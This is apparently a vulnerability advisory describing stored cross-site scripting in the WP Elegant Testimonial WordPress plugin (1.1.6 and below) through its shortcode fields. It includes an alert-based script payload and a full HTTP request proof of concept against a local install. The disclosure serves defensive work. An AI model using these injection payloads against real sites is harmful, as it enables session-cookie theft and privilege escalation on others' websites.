WordPress WP Elegant Testimonial Plugin version 1.1.6 and below were found to be vulnerable to multiple stored XSS vulnerabilities while I was auditing the plugin.
Summary
WordPress WP Elegant Testimonial Plugin is used to insert testimonials into a WordPress site directly from the post editor. It was found to be vulnerable to multiple stored Cross-Site Scripting (XSS) vulnerabilities. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.
Vulnerability
The name, company and text fields used while adding a testimonial to a page was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a user loads a page where the plugin shortcode is used. All WordPress websites using WP Elegant Testimonial Plugin version 1.1.6 and below are affected.
The image below shows our javascript is being executed when the following string is inserted into the post.
[wp_elegant_testimonial name="<script>alert(0)</script>" company="<script>alert(0)</script>" text="<script>alert(0)</script>" image="https://example.com/example.jpg"]
This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation.
Proof of Concept
POST /w/wp-json/wp/v2/posts/277?_locale=user HTTP/1.1
Host: 127.0.0.1
Content-Length: 197
Accept: application/json, */*;q=0.1
X-WP-Nonce: b5b10297e1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://127.0.0.1
Referer: http://127.0.0.1/w/wp-admin/post.php?post=277&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close
{"id":277,"content":"[wp_elegant_testimonial name=\"<script>alert(0)</script>\" company=\"<script>alert(0)</script>\" text=\"<script>alert(0)</script>\" image=\"https://example.com/example.jpg\"]"}Recommendation
All user inputs should be sanitized before publishing the post.
